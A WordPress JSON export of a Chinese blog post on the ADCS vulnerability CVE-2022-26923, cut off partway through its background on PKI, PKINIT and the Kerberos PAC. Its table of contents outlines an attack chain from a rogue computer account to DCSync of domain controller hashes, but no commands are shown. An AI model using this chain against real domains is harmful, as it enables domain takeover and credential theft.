{"id":1020,"date":"2023-09-21T22:42:47","date_gmt":"2023-09-21T14:42:47","guid":{"rendered":"http:\/\/weizn.net\/?p=1020"},"modified":"2026-05-08T16:51:33","modified_gmt":"2026-05-08T08:51:33","slug":"cve-2022-26923%e6%94%bb%e5%87%bb%e5%9f%9f%e6%8e%a7%e8%af%81%e4%b9%a6%e6%9c%8d%e5%8a%a1%ef%bc%88adcs%ef%bc%89","status":"publish","type":"post","link":"http:\/\/weizn.net\/?p=1020","title":{"rendered":"CVE-2022-26923\u57df\u63a7\u8bc1\u4e66\u670d\u52a1\uff08ADCS\uff09"},"content":{"rendered":"<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_17 counter-hierarchy\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\">\u76ee\u5f55<\/p>\n<span class=\"ez-toc-title-toggle\"><a class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" style=\"display: none;\"><i class=\"ez-toc-glyphicon ez-toc-icon-toggle\"><\/i><\/a><\/span><\/div>\n<nav><ul class=\"ez-toc-list ez-toc-list-level-1\"><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-1\" href=\"http:\/\/weizn.net\/?p=1020\/#%E4%B8%80%E3%80%81%E8%83%8C%E6%99%AF%E7%9F%A5%E8%AF%86\" title=\"\u4e00\u3001\u80cc\u666f\u77e5\u8bc6\">\u4e00\u3001\u80cc\u666f\u77e5\u8bc6<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-2\" href=\"http:\/\/weizn.net\/?p=1020\/#1%E3%80%81PKI%E5%85%AC%E9%92%A5%E5%9F%BA%E7%A1%80%E8%AE%BE%E6%96%BD\" title=\"1\u3001PKI\u516c\u94a5\u57fa\u7840\u8bbe\u65bd\">1\u3001PKI\u516c\u94a5\u57fa\u7840\u8bbe\u65bd<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-3\" href=\"http:\/\/weizn.net\/?p=1020\/#2%E3%80%81CA%E8%AF%81%E4%B9%A6%E9%A2%81%E5%8F%91%E6%9C%BA%E6%9E%84\" title=\"2\u3001CA\u8bc1\u4e66\u9881\u53d1\u673a\u6784\">2\u3001CA\u8bc1\u4e66\u9881\u53d1\u673a\u6784<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-4\" 
href=\"http:\/\/weizn.net\/?p=1020\/#3%E3%80%81PKINIT_Kerberos%E8%AE%A4%E8%AF%81\" title=\"3\u3001PKINIT Kerberos\u8ba4\u8bc1\">3\u3001PKINIT Kerberos\u8ba4\u8bc1<\/a><ul class=\"ez-toc-list-level-4\"><li class=\"ez-toc-heading-level-4\"><a class=\"ez-toc-link ez-toc-heading-5\" href=\"http:\/\/weizn.net\/?p=1020\/#%EF%BC%881%EF%BC%89%E4%BB%80%E4%B9%88%E6%98%AFPAC\" title=\"\uff081\uff09\u4ec0\u4e48\u662fPAC\">\uff081\uff09\u4ec0\u4e48\u662fPAC<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-4\"><a class=\"ez-toc-link ez-toc-heading-6\" href=\"http:\/\/weizn.net\/?p=1020\/#%EF%BC%882%EF%BC%89%E4%BB%80%E4%B9%88%E6%98%AFPKINIT\" title=\"\uff082\uff09\u4ec0\u4e48\u662fPKINIT\">\uff082\uff09\u4ec0\u4e48\u662fPKINIT<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-7\" href=\"http:\/\/weizn.net\/?p=1020\/#4%E3%80%81%E8%AF%81%E4%B9%A6%E6%A8%A1%E6%9D%BF\" title=\"4\u3001\u8bc1\u4e66\u6a21\u677f\">4\u3001\u8bc1\u4e66\u6a21\u677f<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-8\" href=\"http:\/\/weizn.net\/?p=1020\/#5%E3%80%81%E8%AF%81%E4%B9%A6%E6%B3%A8%E5%86%8C\" title=\"5\u3001\u8bc1\u4e66\u6ce8\u518c\">5\u3001\u8bc1\u4e66\u6ce8\u518c<\/a><ul class=\"ez-toc-list-level-4\"><li class=\"ez-toc-heading-level-4\"><a class=\"ez-toc-link ez-toc-heading-9\" href=\"http:\/\/weizn.net\/?p=1020\/#%EF%BC%881%EF%BC%89%E6%99%AE%E9%80%9A%E5%9F%9F%E8%B4%A6%E5%8F%B7%E6%B3%A8%E5%86%8C%E8%AF%81%E4%B9%A6\" title=\"\uff081\uff09\u666e\u901a\u57df\u8d26\u53f7\u6ce8\u518c\u8bc1\u4e66\">\uff081\uff09\u666e\u901a\u57df\u8d26\u53f7\u6ce8\u518c\u8bc1\u4e66<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-4\"><a class=\"ez-toc-link ez-toc-heading-10\" href=\"http:\/\/weizn.net\/?p=1020\/#%EF%BC%882%EF%BC%89%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%B4%A6%E5%8F%B7%E6%B3%A8%E5%86%8C%E8%AF%81%E4%B9%A6\" 
title=\"\uff082\uff09\u8ba1\u7b97\u673a\u8d26\u53f7\u6ce8\u518c\u8bc1\u4e66\">\uff082\uff09\u8ba1\u7b97\u673a\u8d26\u53f7\u6ce8\u518c\u8bc1\u4e66<\/a><\/li><\/ul><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-11\" href=\"http:\/\/weizn.net\/?p=1020\/#%E4%BA%8C%E3%80%81%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6\" title=\"\u4e8c\u3001\u5229\u7528\u6761\u4ef6\">\u4e8c\u3001\u5229\u7528\u6761\u4ef6<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-12\" href=\"http:\/\/weizn.net\/?p=1020\/#%E4%B8%89%E3%80%81%E5%88%A9%E7%94%A8%E8%BF%87%E7%A8%8B\" title=\"\u4e09\u3001\u5229\u7528\u8fc7\u7a0b\">\u4e09\u3001\u5229\u7528\u8fc7\u7a0b<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-13\" href=\"http:\/\/weizn.net\/?p=1020\/#1%E3%80%81%E5%AE%9A%E4%BD%8DADCS%E6%9C%8D%E5%8A%A1%E4%BB%A5%E5%8F%8ACA%E6%A0%B9%E8%AF%81%E4%B9%A6\" title=\"1\u3001\u5b9a\u4f4dADCS\u670d\u52a1\u4ee5\u53caCA\u6839\u8bc1\u4e66\">1\u3001\u5b9a\u4f4dADCS\u670d\u52a1\u4ee5\u53caCA\u6839\u8bc1\u4e66<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-14\" href=\"http:\/\/weizn.net\/?p=1020\/#2%E3%80%81%E5%88%9B%E5%BB%BA%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%B4%A6%E5%8F%B7%E5%B9%B6%E8%AE%BE%E7%BD%AEdnshostname%E5%B1%9E%E6%80%A7\" title=\"2\u3001\u521b\u5efa\u8ba1\u7b97\u673a\u8d26\u53f7\u5e76\u8bbe\u7f6ednshostname\u5c5e\u6027\">2\u3001\u521b\u5efa\u8ba1\u7b97\u673a\u8d26\u53f7\u5e76\u8bbe\u7f6ednshostname\u5c5e\u6027<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-15\" href=\"http:\/\/weizn.net\/?p=1020\/#3%E3%80%81%E4%BD%BF%E7%94%A8%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%B4%A6%E5%8F%B7%E7%94%B3%E8%AF%B7%E8%AE%A1%E7%AE%97%E6%9C%BA%E6%A8%A1%E6%9D%BF%E8%AF%81%E4%B9%A6\" 
title=\"3\u3001\u4f7f\u7528\u8ba1\u7b97\u673a\u8d26\u53f7\u7533\u8bf7\u8ba1\u7b97\u673a\u6a21\u677f\u8bc1\u4e66\">3\u3001\u4f7f\u7528\u8ba1\u7b97\u673a\u8d26\u53f7\u7533\u8bf7\u8ba1\u7b97\u673a\u6a21\u677f\u8bc1\u4e66<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-16\" href=\"http:\/\/weizn.net\/?p=1020\/#4%E3%80%81%E4%BD%BF%E7%94%A8%E8%AF%81%E4%B9%A6%E8%BF%9B%E8%A1%8Ckerberos%E8%AE%A4%E8%AF%81%E5%B9%B6%E8%8E%B7%E5%BE%97%E5%AF%B9%E5%BA%94%E7%94%A8%E6%88%B7%E7%9A%84NTLM%E5%93%88%E5%B8%8C\" title=\"4\u3001\u4f7f\u7528\u8bc1\u4e66\u8fdb\u884ckerberos\u8ba4\u8bc1\u5e76\u83b7\u5f97\u5bf9\u5e94\u7528\u6237\u7684NTLM\u54c8\u5e0c\">4\u3001\u4f7f\u7528\u8bc1\u4e66\u8fdb\u884ckerberos\u8ba4\u8bc1\u5e76\u83b7\u5f97\u5bf9\u5e94\u7528\u6237\u7684NTLM\u54c8\u5e0c<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-17\" href=\"http:\/\/weizn.net\/?p=1020\/#5%E3%80%81dcsync%E5%9F%9F%E6%8E%A7hash\" title=\"5\u3001dcsync\u57df\u63a7hash\">5\u3001dcsync\u57df\u63a7hash<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-18\" href=\"http:\/\/weizn.net\/?p=1020\/#%E5%9B%9B%E3%80%81%E5%8A%A0%E5%9B%BA%E6%96%B9%E6%A1%88\" title=\"\u56db\u3001\u52a0\u56fa\u65b9\u6848\">\u56db\u3001\u52a0\u56fa\u65b9\u6848<\/a><\/li><\/ul><\/nav><\/div>\n<div class=\"gfmr-markdown-container\"><div class=\"gfmr-markdown-source\" style=\"display: none;\">&lt;h2&gt;\u4e00\u3001\u80cc\u666f\u77e5\u8bc6&lt;\/h2&gt;\n&lt;h3&gt;1\u3001PKI\u516c\u94a5\u57fa\u7840\u8bbe\u65bd&lt;\/h3&gt;\n&lt;p&gt;PKI\uff08Public Key 
Infrastructure\uff09\u516c\u94a5\u57fa\u7840\u8bbe\u65bd\uff0c\u662f\u63d0\u4f9b\u516c\u94a5\u52a0\u5bc6\u548c\u6570\u5b57\u7b7e\u540d\u670d\u52a1\u7684\u7cfb\u7edf\u6216\u5e73\u53f0\uff0c\u662f\u4e00\u4e2a\u5305\u62ec\u786c\u4ef6\u3001\u8f6f\u4ef6\u3001\u4eba\u5458\u3001\u7b56\u7565\u548c\u89c4\u7a0b\u7684\u96c6\u5408\uff0c\u7528\u6765\u5b9e\u73b0\u57fa\u4e8e\u516c\u94a5\u5bc6\u7801\u4f53\u5236\u7684\u5bc6\u94a5\u548c\u8bc1\u4e66\u7684\u4ea7\u751f\u3001\u7ba1\u7406\u3001\u5b58\u50a8\u3001\u5206\u53d1\u548c\u64a4\u9500\u7b49\u529f\u80fd\u3002\u4f01\u4e1a\u901a\u8fc7\u91c7\u7528 PKI \u6846\u67b6\u7ba1\u7406\u5bc6\u94a5\u548c\u8bc1\u4e66\u53ef\u4ee5\u5efa\u7acb\u4e00\u4e2a\u5b89\u5168\u7684\u7f51\u7edc\u73af\u5883\u3002&lt;\/p&gt;\n&lt;p&gt;PKI\u7684\u57fa\u7840\u6280\u672f\u5305\u62ec\uff1a\u516c\u94a5\u52a0\u5bc6\u3001\u6570\u5b57\u7b7e\u540d\u3001\u6570\u636e\u5b8c\u6574\u6027\u673a\u5236\u3001\u6570\u5b57\u4fe1\u5c01(\u6df7\u5408\u52a0\u5bc6)\u3001\u53cc\u91cd\u6570\u5b57\u7b7e\u540d\u7b49\u3002&lt;\/p&gt;\n&lt;p&gt;PKI\u4f53\u7cfb\u80fd\u591f\u5b9e\u73b0\u7684\u529f\u80fd\u6709\uff1a&lt;\/p&gt;\n&lt;ul&gt;\n&lt;li&gt;\u8eab\u4efd\u9a8c\u8bc1&lt;\/li&gt;\n&lt;li&gt;\u6570\u636e\u5b8c\u6574\u6027&lt;\/li&gt;\n&lt;li&gt;\u6570\u636e\u673a\u5bc6\u6027&lt;\/li&gt;\n&lt;li&gt;\u64cd\u4f5c\u7684\u4e0d\u53ef\u5426\u8ba4\u6027&lt;\/li&gt;\n&lt;\/ul&gt;\n&lt;p&gt;\u5fae\u8f6f\u7684\u6d3b\u52a8\u76ee\u5f55\u8bc1\u4e66\u670d\u52a1&lt;strong&gt;ADCS\u5c31\u662f\u5bf9PKI\u7684\u5b9e\u73b0&lt;\/strong&gt;\uff0c\u6d3b\u52a8\u76ee\u5f55\u8bc1\u4e66\u670d\u52a1\u80fd\u591f\u8ddf\u73b0\u6709\u7684\u6d3b\u52a8\u76ee\u5f55\u57df\u670d\u52a1ADDS\u8fdb\u884c\u7ed3\u5408\uff0c\u53ef\u4ee5\u7528\u4e8e\u8eab\u4efd\u9a8c\u8bc1\u3001\u516c\u94a5\u52a0\u5bc6\u548c\u6570\u5b57\u7b7e\u540d\u7b49\u3002ADCS\u63d0\u4f9b\u6240\u6709\u4e0ePKI\u76f8\u5173\u7684\u7ec4\u4ef6\u4f5c\u4e3a\u89d2\u8272\u670d\u52a1\u3002\u6bcf\u4e2a\u89d2\u8272\u670d\u52a1\u8d1f\u8d23\u8bc1\u4e66\u57fa\u7840\u67b6\u6784\u7
684\u7279\u5b9a\u90e8\u5206\uff0c\u540c\u65f6\u534f\u540c\u5de5\u4f5c\u4ee5\u5f62\u6210\u5b8c\u6574\u7684\u89e3\u51b3\u65b9\u6848\u3002&lt;\/p&gt;\n&lt;h3&gt;2\u3001CA\u8bc1\u4e66\u9881\u53d1\u673a\u6784&lt;\/h3&gt;\n&lt;p&gt;CA\uff08Certificate Authority\uff0c\u8bc1\u4e66\u9881\u53d1\u673a\u6784\uff09\u662fPKI\u7cfb\u7edf\u7684\u6838\u5fc3\u3002\u5176\u4f5c\u7528\u5305\u62ec\u5904\u7406\u8bc1\u4e66\u7533\u8bf7\u3001 \u8bc1\u4e66\u53d1\u653e\u3001 \u8bc1\u4e66\u66f4\u65b0\u3001\u7ba1\u7406\u5df2\u9881\u53d1\u7684\u8bc1\u4e66\u3001\u540a\u9500\u8bc1\u4e66\u548c\u53d1\u5e03\u8bc1\u4e66\u540a\u9500\u5217\u8868(CRL)\u7b49\u3002&lt;\/p&gt;\n&lt;p&gt;Active Directory\u8bc1\u4e66\u670d\u52a1\u4e2d\u7684CA\u6709\u4f01\u4e1aCA\u548c\u72ec\u7acbCA\u3002\u4f01\u4e1aCA\u5fc5\u987b\u662f\u57df\u6210\u5458\uff0c\u5e76\u4e14\u901a\u5e38\u5904\u4e8e\u8054\u673a\u72b6\u6001\u4ee5\u9881\u53d1\u8bc1\u4e66\u6216\u8bc1\u4e66\u7b56\u7565\u3002\u800c\u72ec\u7acbCA\u53ef\u4ee5\u662f\u6210\u5458\u3001\u5de5\u4f5c\u7ec4\u6216\u57df\u3002\u72ec\u7acbCA\u4e0d\u9700\u8981ADDS\u6d3b\u52a8\u76ee\u5f55\u57df\u670d\u52a1\uff0c\u5e76\u4e14\u53ef\u4ee5\u5728\u6ca1\u6709\u7f51\u7edc\u7684\u60c5\u51b5\u4e0b\u4f7f\u7528\u3002\u4f46\u662f\u5728\u57df\u4e2d\u57fa\u672c\u90fd\u662f\u4f7f\u7528\u4f01\u4e1aCA\uff0c\u56e0\u4e3a\u4f01\u4e1aCA\u53ef\u4ee5\u548c\u6d3b\u52a8\u76ee\u5f55\u57df\u670d\u52a1ADDS\u8fdb\u884c\u7ed3\u5408\uff0c\u5176\u4fe1\u606f\u4e5f\u5b58\u50a8\u5728Active 
Directory\u6570\u636e\u5e93\u4e2d\u3002\u4f01\u4e1aCA\u652f\u6301\u57fa\u4e8e\u8bc1\u4e66\u6a21\u677f\u521b\u5efa\u8bc1\u4e66\u548c\u81ea\u52a8\u6ce8\u518c\u8bc1\u4e66\u3002&lt;\/p&gt;\n&lt;p&gt;CA\u62e5\u6709\u516c\u94a5\u548c\u79c1\u94a5\uff1a&lt;\/p&gt;\n&lt;ul&gt;\n&lt;li&gt;\u79c1\u94a5\u53ea\u6709CA\u77e5\u9053\uff0c\u79c1\u94a5\u7528\u4e8e\u5bf9\u9881\u53d1\u7684\u8bc1\u4e66\u8fdb\u884c\u6570\u5b57\u7b7e\u540d&lt;\/li&gt;\n&lt;li&gt;\u516c\u94a5\u4efb\u4f55\u4eba\u90fd\u53ef\u4ee5\u77e5\u9053\uff0c\u516c\u94a5\u7528\u4e8e\u9a8c\u8bc1\u8bc1\u4e66\u662f\u5426\u7531CA\u9881\u53d1&lt;\/li&gt;\n&lt;\/ul&gt;\n&lt;h3&gt;3\u3001PKINIT Kerberos\u8ba4\u8bc1&lt;\/h3&gt;\n&lt;p&gt;\u4e00\u822c\u60c5\u51b5\u4e0bKerberos\u534f\u8bae\u5728AS-REQ\u8bf7\u6c42\u8fc7\u7a0b\u4e2d\uff0c\u662f\u901a\u8fc7\u7528\u6237hash\u52a0\u5bc6\u65f6\u95f4\u6233\u6765\u8fdb\u884cKerberos\u9884\u8eab\u4efd\u8ba4\u8bc1\u3002\u4f46ADCS\u670d\u52a1\u53ef\u4ee5\u548cADDS\u7d27\u5bc6\u642d\u914d\u4f7f\u7528\uff0c\u6240\u4ee5\u5229\u7528\u8bc1\u4e66\u4e5f\u53ef\u4ee5\u8fdb\u884cKerberos\u9884\u8eab\u4efd\u8ba4\u8bc1\u3002&lt;\/p&gt;\n&lt;blockquote&gt;\n&lt;p&gt;&lt;a href=&quot;https:\/\/www.rfc-editor.org\/rfc\/rfc4556.html&quot;&gt;RFC4556 Public Key Cryptography for Initial Authentication in Kerberos (PKINIT)&lt;\/a&gt; \u5f15\u5165\u4e86\u5bf9Kerberos\u9884\u8eab\u4efd\u9a8c\u8bc1\u7684\u516c\u94a5\u52a0\u5bc6\u6280\u672f\u652f\u6301\uff0c\u53ef\u4ee5\u4f7f\u7528\u8bc1\u4e66\u7684\u79c1\u94a5\u6765\u8fdb\u884cKerberos\u9884\u8eab\u4efd\u8ba4\u8bc1\u3002&lt;\/p&gt;\n&lt;\/blockquote&gt;\n&lt;p&gt;\u6b64\u5916\uff0c\u4e3a\u4e86\u652f\u6301\u8fde\u63a5\u5230\u4e0d\u652f\u6301Kerberos\u8eab\u4efd\u9a8c\u8bc1\u7684\u7f51\u7edc\u670d\u52a1\u7684\u5e94\u7528\u7a0b\u5e8f\u7684NTLM\u8eab\u4efd\u9a8c\u8bc1\uff0cKDC\u4f1a\u5728PAC\u7279\u6743\u5c5e\u6027\u8bc1\u4e66\u7684PAC_CREDENTIAL_INFO\u7f13\u51b2\u533a\u4e2d\u8fd4\u56de\u7528\u6237\u7684NTLM 
Hash\uff0c\u4e5f\u5c31\u662f\u8bf4\u5f53\u4f7f\u7528\u8bc1\u4e66\u8fdb\u884cKerberos\u8ba4\u8bc1\u65f6\uff0c\u8fd4\u56de\u7684\u7968\u636e\u7684PAC\u4e2d\u662f\u5305\u542b\u7528\u6237\u7684NTLM Hash\u7684\uff0c\u800c\u4e14\u65e0\u8bba\u4ee5\u540e\u7528\u6237\u5982\u4f55\u66f4\u6539\u5bc6\u7801\uff0c\u8fd4\u56de\u7684NTLM Hash\u90fd\u662f\u5f53\u524d\u7528\u6237\u6700\u65b0\u7684\u3002&lt;\/p&gt;\n&lt;h4&gt;\uff081\uff09\u4ec0\u4e48\u662fPAC&lt;\/h4&gt;\n&lt;p&gt;PAC \u901a\u5e38\u6307\u7684\u662f &quot;Privilege Attribute Certificate&quot;\uff0c\u5b83\u4e0eKerberos\u8ba4\u8bc1\u534f\u8bae\u76f8\u5173\u3002\u5728Active Directory\u73af\u5883\u4e2d\uff0c\u5f53\u7528\u6237\u6216\u670d\u52a1\u4f7f\u7528Kerberos\u8fdb\u884c\u8eab\u4efd\u9a8c\u8bc1\u65f6\uff0cPAC\u5305\u542b\u5728Kerberos\u7968\u8bc1\u4e2d\uff08\u7279\u522b\u662f\u5728TGT\u548cservice ticket\u4e2d\uff09\u3002&lt;\/p&gt;\n&lt;p&gt;\u4ee5\u4e0b\u662fPAC\u7684\u4e3b\u8981\u7279\u70b9\u548c\u5185\u5bb9\uff1a&lt;\/p&gt;\n&lt;ul&gt;\n&lt;li&gt;\n&lt;p&gt;&lt;strong&gt;\u7528\u6237\u7684\u5b89\u5168\u6807\u8bc6\u7b26 
(SID)&lt;\/strong&gt;\uff1a\u8fd9\u662f\u7528\u6237\u7684\u552f\u4e00\u6807\u8bc6\u7b26\uff0c\u4ee5\u53ca\u7528\u6237\u6240\u5c5e\u7684\u6240\u6709\u7ec4\u7684SID\u3002&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;&lt;strong&gt;\u7528\u6237\u7684\u6743\u9650\u548c\u7ec4\u6210\u5458\u8d44\u683c&lt;\/strong&gt;\uff1a\u8fd9\u5305\u62ec\u7528\u6237\u5728\u57df\u4e2d\u7684\u6240\u6709\u7ec4\u6210\u5458\u8d44\u683c\uff0c\u65e0\u8bba\u5b83\u4eec\u662f\u76f4\u63a5\u7684\u8fd8\u662f\u5d4c\u5957\u7684\u3002&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;&lt;strong&gt;\u8eab\u4efd\u9a8c\u8bc1\u4fe1\u606f&lt;\/strong&gt;\uff1aPAC\u5305\u542b\u5173\u4e8e\u7528\u6237\u7684\u5176\u4ed6\u9a8c\u8bc1\u4fe1\u606f\uff0c\u8fd9\u6709\u52a9\u4e8e\u670d\u52a1\u786e\u5b9a\u7528\u6237\u7684\u8eab\u4efd\u548c\u6743\u9650\u3002&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;&lt;strong&gt;\u52a0\u5bc6&lt;\/strong&gt;\uff1a\u4e3a\u4e86\u4fdd\u8bc1\u5b89\u5168\uff0cPAC\u7684\u5185\u5bb9\u662f\u52a0\u5bc6\u7684\uff0c\u53ea\u6709\u5177\u6709\u6b63\u786e\u5bc6\u94a5\u7684\u670d\u52a1\u624d\u80fd\u89e3\u5bc6\u5b83\u3002&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;\/ul&gt;\n&lt;p&gt;PAC\u7684\u5b58\u5728\u6709\u52a9\u4e8e\u63d0\u9ad8\u6548\u7387\uff0c\u56e0\u4e3a\u4e00\u65e6\u7528\u6237\u5f97\u5230\u4e00\u4e2aKerberos\u7968\u636e\uff0c\u4ed6\u4eec\u5c31\u4e0d\u9700\u8981\u518d\u6b21\u67e5\u8be2Active 
Directory\u6765\u786e\u5b9a\u4ed6\u4eec\u7684\u6743\u9650\u6216\u7ec4\u6210\u5458\u8d44\u683c\u3002\u76f8\u53cd\uff0c\u8fd9\u4e9b\u4fe1\u606f\u90fd\u5305\u542b\u5728PAC\u4e2d\uff0c\u5e76\u968f\u7968\u636e\u4e00\u8d77\u53d1\u9001\u3002&lt;\/p&gt;\n&lt;p&gt;\u7136\u800c\uff0cPAC\u4e5f\u53ef\u80fd\u589e\u52a0\u7968\u636e\u7684\u5927\u5c0f\uff0c\u7279\u522b\u662f\u5f53\u7528\u6237\u662f\u5f88\u591a\u7ec4\u7684\u6210\u5458\u65f6\u3002\u8fd9\u53ef\u80fd\u4f1a\u5bfc\u81f4\u4e00\u4e9b\u95ee\u9898\uff0c\u4f8b\u5982\u5982\u679c\u7968\u636e\u592a\u5927\u800c\u4e0d\u80fd\u9002\u5e94\u7f51\u7edc\u5305\u3002\u4e3a\u4e86\u89e3\u51b3\u8fd9\u4e2a\u95ee\u9898\uff0c\u6709\u65f6\u53ef\u80fd\u9700\u8981\u8c03\u6574\u76f8\u5173\u7684\u914d\u7f6e\u6216\u51cf\u5c11\u7528\u6237\u7684\u7ec4\u6210\u5458\u8d44\u683c\u3002&lt;\/p&gt;\n&lt;p&gt;\u603b\u7684\u6765\u8bf4\uff0cPAC\u662fKerberos\u5728Active Directory\u73af\u5883\u4e2d\u7684\u4e00\u4e2a\u91cd\u8981\u7ec4\u6210\u90e8\u5206\uff0c\u5b83\u5e2e\u52a9\u670d\u52a1\u5feb\u901f\u786e\u5b9a\u7528\u6237\u7684\u6743\u9650\u548c\u8eab\u4efd\uff0c\u800c\u65e0\u9700\u518d\u6b21\u67e5\u8be2AD\u3002&lt;\/p&gt;\n&lt;h4&gt;\uff082\uff09\u4ec0\u4e48\u662fPKINIT&lt;\/h4&gt;\n&lt;p&gt;PKINIT\uff08Public Key Cryptography for Initial 
Authentication\uff09\u662fKerberos\u8eab\u4efd\u9a8c\u8bc1\u534f\u8bae\u7684\u4e00\u4e2a\u6269\u5c55\u3002\u5b83\u5141\u8bb8Kerberos\u7684\u521d\u59cb\u8eab\u4efd\u9a8c\u8bc1\u4f7f\u7528\u516c\u94a5\u52a0\u5bc6\u6280\u672f\uff0c\u800c\u4e0d\u662f\u4f20\u7edf\u7684\u5bc6\u7801\u3002&lt;\/p&gt;\n&lt;p&gt;\u5177\u4f53\u6765\u8bf4\uff0c\u8fd9\u662f\u5982\u4f55\u5de5\u4f5c\u7684\uff1a&lt;\/p&gt;\n&lt;ul&gt;\n&lt;li&gt;\n&lt;p&gt;&lt;strong&gt;\u516c\u94a5\u8bc1\u4e66&lt;\/strong&gt;\uff1a\u5728PKINIT\u4e2d\uff0c\u7528\u6237\u6216\u670d\u52a1\u62e5\u6709\u4e00\u4e2a\u516c\u94a5\u8bc1\u4e66\uff08\u901a\u5e38\u662fX.509\u683c\u5f0f\uff09\u3002&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;&lt;strong&gt;\u521d\u59cb\u8eab\u4efd\u9a8c\u8bc1&lt;\/strong&gt;\uff1a\u5f53\u7528\u6237\u5c1d\u8bd5\u8fdb\u884cKerberos\u8eab\u4efd\u9a8c\u8bc1\u65f6\uff0c\u4ed6\u4eec\u53ef\u4ee5\u4f7f\u7528\u5176\u79c1\u94a5\u5bf9\u67d0\u4e9b\u4fe1\u606f\u8fdb\u884c\u7b7e\u540d\uff0c\u7136\u540e\u5c06\u7b7e\u540d\u7684\u4fe1\u606f\u4e0e\u5176\u516c\u94a5\u8bc1\u4e66\u4e00\u8d77\u53d1\u9001\u7ed9KDC\uff08Key Distribution Center\uff09\u3002KDC\u9a8c\u8bc1\u7b7e\u540d\u5e76\u68c0\u67e5\u8bc1\u4e66\u7684\u6709\u6548\u6027\uff08\u901a\u5e38\u4e0e\u4fe1\u4efb\u7684\u8bc1\u4e66\u9881\u53d1\u673a\u6784\u5217\u8868\u8fdb\u884c\u6bd4\u8f83\uff09\u3002&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;&lt;strong&gt;\u7968\u636e\u9881\u53d1&lt;\/strong&gt;\uff1a\u4e00\u65e6KDC\u9a8c\u8bc1\u4e86\u7528\u6237\u7684\u8eab\u4efd\uff0c\u5b83\u5c06\u50cf\u5f80\u5e38\u4e00\u6837\u9881\u53d1\u4e00\u4e2aTGT\uff08Ticket Granting 
Ticket\uff09\u3002&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;\/ul&gt;\n&lt;p&gt;\u8fd9\u79cd\u65b9\u6cd5\u7684\u597d\u5904\u662f\uff1a&lt;\/p&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;strong&gt;\u589e\u5f3a\u7684\u5b89\u5168\u6027&lt;\/strong&gt;\uff1a\u516c\u94a5\u52a0\u5bc6\u6280\u672f\u63d0\u4f9b\u4e86\u6bd4\u4f20\u7edf\u5bc6\u7801\u66f4\u5f3a\u5927\u7684\u5b89\u5168\u6027\u3002&lt;\/li&gt;\n&lt;li&gt;&lt;strong&gt;\u667a\u80fd\u5361\u652f\u6301&lt;\/strong&gt;\uff1aPKINIT\u5e38\u5e38\u4e0e\u667a\u80fd\u5361\u7ed3\u5408\u4f7f\u7528\u3002\u7528\u6237\u7684\u8bc1\u4e66\u548c\u79c1\u94a5\u5b58\u50a8\u5728\u667a\u80fd\u5361\u4e0a\uff0c\u4f7f\u5f97\u8eab\u4efd\u9a8c\u8bc1\u8fc7\u7a0b\u66f4\u4e3a\u5b89\u5168\u3002&lt;\/li&gt;\n&lt;\/ul&gt;\n&lt;p&gt;\u7f3a\u70b9\uff1a&lt;\/p&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;strong&gt;\u590d\u6742\u6027&lt;\/strong&gt;\uff1a\u90e8\u7f72\u548c\u7ba1\u7406PKI\uff08Public Key 